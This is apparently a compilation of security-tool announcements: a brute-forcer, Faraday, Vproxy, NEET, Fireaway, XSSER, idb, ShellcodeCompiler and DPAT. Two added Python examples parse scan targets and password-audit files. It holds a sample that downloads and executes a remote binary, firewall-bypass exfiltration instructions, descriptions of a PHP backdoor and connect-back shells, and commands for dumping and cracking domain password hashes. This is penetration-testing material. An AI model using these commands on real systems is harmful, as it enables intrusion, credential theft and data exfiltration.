-p  Ports to scan, comma-separated for multiple ports, e.g. 1433,3306,5432. The default ports (21,23,1433,3306,5432,6379,9200,11211,27017) are used if none are specified.
-m  Number of threads. Default is 100.
-t  Seconds to wait before timeout.
-d  Dictionary file.
-n  Scan without the ping scan (live host detection).
Example:
python F-Scrack.py -h 10.111.1
python F-Scrack.py -h 192.168.1.1 -d pass.txt
python F-Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 6
python F-Scrack.py -h ip.ini -n
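
As an added example, not taken from F-Scrack, here is a parser for the target forms the -h option accepts that expands them into a capped, de-duplicated address list. The assumption that a three-octet value such as 192.168.1 means hosts .1 through .254, the read_file hook and the sample ip.ini contents are this example's own.

```python
"""Added example, not F-Scrack's code: expand the -h target forms (single IP,
'a.b.c' for a /24, 'start-end' range, or a file of such entries) into a list
of addresses capped at the per-scan limit the usage text states."""
import ipaddress

MAX_TARGETS = 65535  # per-scan limit from the F-Scrack usage text

# Constructed ip.ini: one spec per line, '#' comment lines ignored.  The last
# entry is already inside the /24 above it and is dropped by de-duplication.
SAMPLE_IP_INI = """\
# constructed sample list
10.111.1.5
192.168.1
10.111.2.250-10.111.3.3
192.168.1.7
"""


def _looks_like_address(spec):
    spec = spec.strip()
    return bool(spec) and all(c in "0123456789.-" for c in spec)


def expand_spec(spec):
    """Yield IPv4 address strings for one address-form spec."""
    spec = spec.strip()
    if "-" in spec:                                   # inclusive start-end range
        start, end = (ipaddress.IPv4Address(p.strip()) for p in spec.split("-", 1))
        if end < start:
            raise ValueError(f"range end before start: {spec}")
        for n in range(int(start), int(end) + 1):
            yield str(ipaddress.IPv4Address(n))
    elif spec.count(".") == 2:                        # '192.168.1' -> whole /24
        net = ipaddress.IPv4Network(spec + ".0/24")
        for host in net.hosts():                      # .1 .. .254 (assumption)
            yield str(host)
    else:
        yield str(ipaddress.IPv4Address(spec))        # validates a single IP


def expand_targets(spec, read_file=None):
    """Return the target list for an -h value.  Anything that is not an
    address form is treated as a list file, read through `read_file` (a
    callable returning the file text) so the example can run without disk I/O."""
    if _looks_like_address(spec):
        entries = [spec]
    else:
        if read_file is None:
            def read_file(path):
                with open(path, encoding="utf-8") as fh:
                    return fh.read()
        entries = [ln for ln in read_file(spec).splitlines()
                   if ln.strip() and not ln.lstrip().startswith("#")]
    seen, targets = set(), []
    for entry in entries:
        for ip in expand_spec(entry):
            if ip in seen:
                continue
            seen.add(ip)
            targets.append(ip)
            if len(targets) > MAX_TARGETS:
                raise ValueError(f"more than {MAX_TARGETS} targets in {spec!r}")
    return targets


if __name__ == "__main__":
    hosts = expand_targets("ip.ini", read_file=lambda path: SAMPLE_IP_INI)
    print(len(hosts), "targets, first", hosts[0], "last", hosts[-1])
```

Validating the whole target list up front, before any connection is made, is also what keeps a typo such as a missing octet from silently turning into a far larger scan than intended.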


Faraday v2.2 - Collaborative Penetration Test and Vulnerability Management Platform

Faraday is the Integrated Multiuser Risk Environment you were looking for! It maps and leverages all the knowledge you generate in real time, letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the impact and risk being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that help users improve their own work, the main purpose is to re-use the available tools in the community taking advantage of them in a collaborative way!

This release features a brand new library to connect with Faraday Server!

Managing vulnerabilities is now easier in Faraday!

Status and creator fields

A simple change can go a long way - we added two new ways of classifying issues stored in Faraday.

With the new update it is now possible to check the status of an issue - this could be opened, closed, re-opened or the risk is accepted.

If you set a vulnerability status as closed and later on when you re-scan the target the same issue is found again, the status will automatically change into re-opened allowing you to have a more granular view of the results of your scans. This is perfect for doing remediation retests, helping you to quickly understand what is still vulnerable.

Also, issues created by a specific tool can now be filtered and sorted, a great way to see the sources of information used during an engagement.

For example, as we can see in the following screenshots, we have three different issues that are closed [1]. After we import a Nessus scan the issues are marked as re-opened [2], indicating that the vulnerability is still present in the last scan.

1. Closed issues

2. Re-opened by Nessus scan import

Corporate Changes:

  • Added a message to configure the Webshell - added a descriptive message for users who don’t have the Webshell properly configured

Webshell configuration message

Changes:

  • New library to connect with Faraday Server 
  • Fixed Fplugin, now it uses the new library to communicate with the Server 
  • New fields for Vulnerabilities: plugin creator and status
  • Refactor in Faraday Core and GTK Client 
  • Bug fixing in Faraday Client and Server 
  • News boxes example in the WEB UI
  • New plugins: Dirb, Netdiscover, FruityWifi, Sentinel 
  • Improvements on the WPscan plugin 
  • Fixed Licenses search - there was a bug that disabled the option to search for licenses, now it is fixed and full-text search is enabled in the Licenses component



Licenses search
  • Refactor Licenses module to be compatible with JS Strict Mode - in our efforts to improve our existing codebase for the WEB UI we refactored this component in order to make it run using Strict Mode in JavaScript

https://www.faradaysec.com
https://github.com/infobyte/faraday
https://twitter.com/faradaysec
https://forum.faradaysec.com/

Vproxy - Forward HTTP/S Traffic To Proxy Instance


If you are familiar with mobile penetration testing and have done one before, you have probably come across this situation: you want to intercept the application's HTTP or HTTPS traffic using your favorite proxy tool such as Burp Suite, Fiddler, Charles, etc.

After modifying the Wi-Fi connection and adding your proxy host and port there, you should immediately be able to capture the HTTP/S traffic.

However, this method does not always work, since some mobile applications use customized HTTP/S functionality within the device.

So what should you do in order to capture all of the HTTP/S traffic from the mobile device without breaking your head? It's simple: use Vproxy!

Vproxy
Vproxy is a Python script built to quickly configure a PPTP VPN server that redirects HTTP/S traffic to your favorite proxy instance host.

Screenshot


System Requirements
This script was built and tested on Kali Linux and should work on any Linux distribution.

Prerequisites
pip install termcolor

Usage
Set up a VPN server on localip and redirect traffic sent from the clients (ports 80 and 443) to the proxy at 192.168.1.10:8080:
$ sudo python vproxy.py -localip 192.168.1.9 -phost 192.168.1.10 -pport 8080 -port 80,443

The Goal
  1. Help penetration testers conduct mobile security assessments more easily
  2. Intercept Mobile HTTP/S traffic from any mobile device

Configuring VPN Videos
iOS - https://www.youtube.com/watch?v=TC-xJ9rCTXU
Android - https://www.youtube.com/watch?v=bFeJZKX4O3A


NEET - Network Enumeration and Exploitation Tool


Neet is a flexible, multi-threaded tool for network penetration testing. It runs on Linux and co-ordinates the use of numerous other open-source network tools, with the aim of gathering as much network information as possible in clear, easy-to-use formats. The core scanning engine finds and identifies network services, the modules test or enumerate those services, and the Neet Shell provides an integrated environment for processing the results and exploiting known vulnerabilities. As such, it sits somewhere between manually running your own port scans and subsequent tests, and running a fully automated vulnerability assessment (VA) tool. It has many options which allow the user to tune the test parameters for network scanning in the most efficient and practical way.

Install
git clone https://github.com/JonnyHightower/neet.git
cd neet
sudo bash install.sh

Neet is aimed at professional penetration testers, internal IT security teams and network administrators who wish to know more about what's actually on their network infrastructure. You might want to try it out if you fall into one of those categories.

It has been written (and continues to be developed) by a professional penetration tester over years of engagements, and has been designed explicitly to do the leg-work for you and to make it convenient and safe to get your hands on useful network information before the customer brings your first cup of tea of the day.

Neet has a simple and flexible command-line interface, and gathers a lot of data about the networks within its scope. It will give you an up-to-the second view of how many services it's found on the network, what types of services they are, what types of hosts, what their hostnames are, whether they belong to domains, etc. If the modules are enabled (as they are by default) then it will perform tests against certain services - looking for default SNMP community strings and enumerating whatever is possible from SMB services, for example. It will also check for glaring security vulnerabilities and allow you to exploit them if you so choose.

All the information gathered is stored in human-readable text files so they can be grepped and awked as the user sees fit and, as well as storing the raw data, Neet aggregates a lot of it into files of related information for easier processing.

There's also a customised shell which takes a lot of the common tasks you'd normally perform and rolls them into simple commands. For example, the win command lists the Windows hosts on the network, and cross-references them against issues and vulnerabilities found to give you a colour-coded list of live Windows hosts, and the testshares command checks for unauthenticated access to SMB shares.

There is also documentation. Check out the man pages, the help command inside the neet shell, and the HTML documentation in /opt/neet/doc. Also, please check out the project page for the latest news and issue tracking/feature requests.

In summary, Neet is not a point-and-click hacking or vulnerability assessment tool. It is a console-based environment best run under X Windows, designed for the operator to gain insight into the components, relationships and operation of the network under test. It is also designed to help reporting by gathering as much evidence as possible.

Some of the main features include:
  • Single interface to co-ordinate many tools;
  • Port scans and service identification are done in batches, so useful results appear early on;
  • Easy to specify ranges to include and exclude, both for IP addresses and ports;
  • Doesn't create more traffic than is strictly necessary;
  • Detailed, timestamped logging;
  • All raw tool output available, as well as sensibly-arranged output in text format;
  • Customisable speed and intensity;
  • Reliable scanning from multiple interfaces and over VPNs;
  • Scan control allows you to pause / resume the scan;
  • Cancel scans on individual hosts;
  • Monitor progress of the scanning;
  • Very configurable;
  • Neet shell (neetsh) is a bash shell with many aliases for getting through results quickly;
  • Exploitation for specific exploits included in the Neet shell;
  • Dump credentials from remote hosts directly into your Neet results without manually shunting files and commands between machines;
  • Online incremental updates without having to do a full reinstall each time;
  • Documentation: man pages, HTML help and the help command in the Neet shell;
  • Many more.


Fireaway - Next Generation Firewall Audit and Bypass Tool


Fireaway is a tool for auditing, bypassing, and exfiltrating data against layer 7/AppID inspection rules on next generation firewalls. These tactics are based on the principle of having to allow connections to establish through the NGFW in order to see layer 7 data to filter, as well as spoofing applications to hide communication channels inside the firewall logs as normal user traffic, such as Internet surfing.

Starting the FireAway Server: Typically the FireAway server would be started on the egress side of the firewall (such as a server on the Internet), and listen on a port believed to be closed to see if any application based rules allow traffic out on this port:
python fa_server.py <port to listen on>
All data received by the server on this port will be saved to the file ReceivedData.txt in the directory the server was launched from. If the server detects differing sizes in the amount of data received (indicating firewall filtering has kicked in), this output will be shown on the server console:
Got the same or lower amount of data on two consecutive runs.  If sending test data, maximum data leak size may have been reached.
Starting the FireAway Client/Application Spoofer: The FireAway client has two modes:
  • Test mode (mode 0): send random data in incrementing chunk sizes to see how much data can be sent before the firewall AppID engages and stops traffic flow.
  • Exfiltration mode (mode 1): open a file and send it in chunks through the firewall.
To start the basic client:
python fa_client.py <FireAway server IP> <Fireaway Server Port> <Client mode (0 or 1)>
To start the application spoofing client:
python fa_spoof.py <FireAway Server IP> <Fireaway Server Port> <Client mode (0 or 1)>
Application spoofing will randomly insert HTTP headers with the data chunks to pollute the logs with various applications in order to mask the data exfiltration.



XSSER - From XSS to RCE


From XSS to RCE 2.5 - Black Hat Europe Arsenal 2016

Demo

Requirements
  • Python (2.7.*, version 2.7.11 was used for development and demo)
  • Gnome
  • Bash
  • Msfconsole (accessible via environment variables)
  • Netcat (nc)
  • cURL (curl) [NEW]
  • PyGame (apt-get install python-pygame) [NEW]

Payload Compatibility
  • Chrome (14 Nov 2015) - This should still work.
  • Firefox (04 Nov 2016) - Tested live at Black Hat Arsenal 2016

WordPress Lab

WordPress Exploit

Joomla Lab

Joomla Exploit

Directories
  • Audio: Contains remixed audio notifications.
  • Exploits: Contains DirtyCow (DCOW) privilege escalation exploits.
  • Joomla_Backdoor: Contains a sample Joomla extension backdoor which can be uploaded as an administrator and subsequently used to execute arbitrary commands on the system with system($_GET['c']).
  • Payloads/javascript: Contains the JavaScript payloads. Contains a new "add new admin" payload for Joomla.
  • Shells: Contains the PHP shells to inject, including a slightly modified version of pentestmonkey's shell that connects back via wget.

Developed By
  • Hans-Michael Varbaek
  • Sense of Security

Credits
  • MaXe / InterN0T

Dripcap - Caffeinated Packet Analyzer

idb - iOS App Security Assessment Tool

idb is a tool to simplify some common tasks for iOS app security assessments and research. Please see the Documentation for a more detailed summary of each function.

Features
  • Assessment Setup
    • SSH port forwarding
    • Installation of helper utilities
  • App Information
    • Bundle information
    • Registered URL Schemes
    • Platform and SDK Versions
    • Data folder location
    • Entitlements
  • Data Storage
    • List plist files and data protection class
    • List sqlite files and data protection class
    • List Cache.db files and data protection class
    • Full app file system browser
      • Browse files
      • Download/view files
      • Check data protection
      • Rsync folders and keep git revisions
    • Dump iOS keychain
  • Binary Analysis
    • Check for encryption
    • Check for protections (ASLR/PIE, DEP, ARC)
    • List shared libraries
    • Extract strings in app binary
    • Dump class and method signatures
  • IPC
    • List URL handlers
    • Invoke and fuzz URL handlers
    • Monitor the iOS pasteboard
  • Other Tools
    • Check for iOS backgrounding screenshot
    • Install certificates
    • Edit /etc/hosts file

ShellcodeCompiler - Shellcode C/C++ Compiler for Windows


Shellcode Compiler is a program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows. It is possible to call any Windows API function in a user-friendly way.

Shellcode Compiler takes a source file as input and uses its own compiler to interpret the code and generate an assembly file, which is assembled with NASM ( http://www.nasm.us/ ).
Shellcode Compiler was released at the DefCamp security conference in Romania, November 2016.

Command line options
-h (--help)      : Show this help message
-v (--verbose)   : Print detailed output
-t (--test)      : Test (execute) generated shellcode
-r (--read)      : Read source code file
-o (--output)    : Output file of the generated binary shellcode
-a (--assembbly) : Output file of the generated assembly code

Source code example
function URLDownloadToFileA("urlmon.dll");
function WinExec("kernel32.dll");
function ExitProcess("kernel32.dll");

URLDownloadToFileA(0,"https://site.com/bk.exe","bk.exe",0,0);
WinExec("bk.exe",0);
ExitProcess(0);

Invocation example
ShellcodeCompiler.exe -r Source.txt -o Shellcode.bin -a Assembly.asm

Limitations
  1. It is not possible to use the return value of an API call
  2. It is not possible to use pointers or buffers
  3. It is not possible to declare variables
All these limitations will be fixed as soon as possible. However, many other limitations will exist. This is an Alpha version. Please report any bugs or suggestions.


DPAT - Domain Password Audit Tool for Pentesters

This is a python script that will generate password use statistics from password hashes dumped from a domain controller and a password crack file such as oclHashcat.pot generated from the oclHashcat tool during password cracking. The report is an HTML report with clickable links.


You can run the Python script as follows.
dpat.py -n customer.ntds -c oclHashcat.pot -g "Domain Admins.txt" "Enterprise Admins.txt"
Note that the group lists at the end (-g "Domain Admins.txt" "Enterprise Admins.txt") are optional.

Try this out on the example files provided in the sample_data folder of this project. The sample data was built from census data for common first and last names and passwords from the well-known rockyou list.
Your customer.ntds file should be in this format:
domain\username:RID:lmhash:nthash:::
You can get this file by first dumping the password hashes from your domain controller by executing the following command in an administrative command prompt on a domain controller. Just make sure you have enough disk space to store the output in c:\temp. The amount of space needed will be slightly larger than the size of the ntds.dit file that is currently on the disk, as this performs a backup of that file and some registry settings.
ntdsutil "ac in ntds" "ifm" "cr fu c:\temp" q q
You can then turn this output into the needed format using secretsdump.py
secretsdump.py -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL -outputfile customer
The command above will create a file called "customer.ntds" which you will use with this tool as well as for password cracking.
Your oclHashcat file should be in this format:
nthash:password
Or for LM Hashes:
lmhashLeftOrRight:leftOrRightHalfPasswordUpcased
The optional "-g" option is followed by a list of any number of files containing lists of users who are in the given group such as "Enterprise Admins" or "Domain Admins". The file can be in the format output by the PowerView PowerShell script as shown in the example below:
Get-NetGroupMember -GroupName "Domain Admins" > "Domain Admins.txt"
or to read a group from another domain use something like the following (note that name of the other domain and the domain controller can be obtained with Get-NetForestDomain)
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain "some.domain.com" -DomainController "DC01.some.domain.com" > "Enterprise Admins.txt"
Alternatively, the group files can simply be a list of users, one per line, in the following format:
domain\username
The Domain Password Audit Tool also has the handy feature of finishing the cracking of the LM hashes for any hashes where the NT hash was not cracked. This assumes that you have used oclHashcat to brute-force all 7-character passwords with the following command:
./oclHashcat64.bin -m 3000 -a 3 customer.ntds -1 ?a ?1?1?1?1?1?1?1 --increment
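
To make the three file formats above concrete, here is an added example (my own code, not DPAT's) that parses constructed NTDS-format and .pot lines, joins them and computes the figures a domain password audit report is built from: how many accounts are cracked, which accounts share an NT hash, exposure per group list, and the uppercase candidate reassembled from two cracked LM halves for accounts whose NT hash is still uncracked. All account names and hashes are placeholders I made up; the only real value is aad3b435b51404eeaad3b435b51404ee, the LM hash of an empty password, which is what marks accounts with no LM hash stored.

```python
"""Added example, not DPAT's code: parse the NTDS dump and hashcat pot formats
described on the page and compute password-audit statistics from them.
Every hash and account here is a constructed placeholder except EMPTY_LM."""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # real constant: LM hash of ""

# Constructed NTDS lines: domain\username:RID:lmhash:nthash:::
NTDS_SAMPLE = """\
corp.example\\alice:1104:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
corp.example\\bob:1105:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
corp.example\\carol:1106:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
corp.example\\dave:1107:33333333333333334444444444444444:55555555555555555555555555555555:::
corp.example\\svc_backup:1108:aad3b435b51404eeaad3b435b51404ee:66666666666666666666666666666666:::
"""

# Constructed pot file: nthash:password lines plus lmhalf:UPPERCASEHALF lines
POT_SAMPLE = """\
11111111111111111111111111111111:Summer2016!
22222222222222222222222222222222:Password1
3333333333333333:PASSWOR
4444444444444444:D123
"""

# Constructed group list files (file name -> contents, one domain\user per line)
GROUP_FILES = {
    "Domain Admins.txt": "corp.example\\alice\ncorp.example\\svc_backup\n",
}


def parse_ntds(text):
    accounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, rid, lm, nt = line.split(":")[:4]
        accounts.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return accounts


def parse_pot(text):
    """Split pot entries into NT (32 hex digits) and LM-half (16) lookups."""
    nt, lm_half = {}, {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        digest, _, plain = line.partition(":")
        (nt if len(digest) == 32 else lm_half)[digest.lower()] = plain
    return nt, lm_half


def audit(accounts, nt_cracked, lm_halves, group_files):
    by_nt = defaultdict(list)
    for a in accounts:
        by_nt[a["nt"]].append(a["user"])
    cracked = {a["user"]: nt_cracked[a["nt"]] for a in accounts if a["nt"] in nt_cracked}

    lm_candidates = {}
    for a in accounts:
        if a["lm"] == EMPTY_LM or a["user"] in cracked:
            continue
        left, right = a["lm"][:16], a["lm"][16:]
        if left in lm_halves and right in lm_halves:
            # LM is case-insensitive, so this is the password with case lost;
            # DPAT then tries case variants against the NT hash (not done here)
            lm_candidates[a["user"]] = lm_halves[left] + lm_halves[right]

    groups = {}
    for fname, text in group_files.items():  # group name comes from the file name
        members = [ln.strip() for ln in text.splitlines() if ln.strip()]
        groups[fname.rsplit(".", 1)[0]] = {
            "members": len(members),
            "cracked": sum(m in cracked for m in members),
        }

    return {
        "total": len(accounts),
        "cracked": len(cracked),
        "reused": {h: users for h, users in by_nt.items() if len(users) > 1},
        "lm_enabled": [a["user"] for a in accounts if a["lm"] != EMPTY_LM],
        "lm_candidates": lm_candidates,
        "groups": groups,
    }


if __name__ == "__main__":
    accts = parse_ntds(NTDS_SAMPLE)
    nt_map, lm_map = parse_pot(POT_SAMPLE)
    for key, value in audit(accts, nt_map, lm_map, GROUP_FILES).items():
        print(f"{key}: {value}")
```

The reused dictionary is the finding worth reporting first: two accounts with the same NT hash have the same password, whether or not it was cracked, and the lm_enabled list identifies accounts that still store the weak LM form at all.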
To see all available DPAT options use the '-h' or '--help' option
usage: dpat.py [-h] -n NTDSFILE -c CRACKFILE [-o OUTPUTFILE]
               [-d REPORTDIRECTORY] [-w] [-s]
               [-g [GROUPLISTS [GROUPLISTS ...]]]

This script will perfrom a domain password audit based on an extracted NTDS
file and password cracking output such as oclHashcat.

optional arguments:
  -h, --help            show this help message and exit
  -n NTDSFILE, --ntdsfile NTDSFILE
                        NTDS file name (output from SecretsDump.py)
  -c CRACKFILE, --crackfile CRACKFILE
                        Password Cracking output in the default form output by
                        oclHashcat, such as oclHashcat.pot
  -o OUTPUTFILE, --outputfile OUTPUTFILE
                        The name of the HTML report output file, defaults to
                        _DomainPasswordAuditReport.html
  -d REPORTDIRECTORY, --reportdirectory REPORTDIRECTORY
                        Folder containing the output HTML files, defaults to
                        DPAT Report
  -w, --writedb         Write the SQLite database info to disk for offline
                        inspection instead of just in memory. Filename will be
                        "pass_audit.db"
  -s, --sanitize        Sanitize the report by partially redacting passwords
                        and hashes. Prepends the report directory with
                        "Sanitized - "
  -g [GROUPLISTS [GROUPLISTS ...]], --grouplists [GROUPLISTS [GROUPLISTS ...]]
                        The name of one or multiple files that contain lists
                        of usernames in particular groups. The group names
                        will be taken from the file name itself. The username
                        list must be in the same format as found in the NTDS
                        file such as some.ad.domain.com\username. Example: -g
                        "Domain Admins.txt" "Enterprise Admins.txt"

